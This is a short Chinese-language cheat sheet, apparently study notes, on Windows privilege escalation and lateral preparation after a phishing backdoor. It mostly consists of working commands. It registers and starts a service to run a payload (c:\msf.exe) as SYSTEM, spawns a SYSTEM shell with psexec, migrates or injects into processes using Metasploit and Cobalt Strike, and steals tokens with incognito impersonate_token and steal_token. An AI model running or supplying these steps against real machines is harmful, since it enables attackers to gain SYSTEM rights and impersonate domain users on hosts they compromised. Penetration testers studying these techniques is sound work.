应用场景：

1、常规某个机器被钓鱼后门攻击后，我们需要做更高权限操作或权限维持等。

2、内网域中某个机器被钓鱼后门攻击后，我们需要对后续内网域做安全测试。

 

主要当前技术入口点：

-当前权限由钓鱼攻击获取

 

主要当前技术应用点：

-当前受控机在内网域环境

1、提权system与内网交互

2、降权到域用户与内网交互

 

#服务启动（提权）

sc是用于与服务控制管理器和服务进行通信的命令行程序。

适用版本：windows 7、10、08、12、16、19、22，早期用at命令

1、创建一个名叫syscmd的执行文件服务

sc Create syscmd binPath= "c:\msf.exe"

2、运行服务

sc start syscmd

 

#远程控制（提权）

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec.exe -accepteula -s -i -d cmd #调用运行cmd

 

#进程注入（降权&提权）

MSF：

ps //查看进程

migrate PID //迁移对应PID

CS:

ps //查看进程

inject PID //注入对应PID

 

#令牌窃取（降权&提权）

MSF：

use incognito

list_tokens -u

impersonate_token "NT AUTHORITY\SYSTEM"

CS:

ps //查看进程

steal_token PID //窃取进程令牌

spawnu PID //窃取进程令牌上线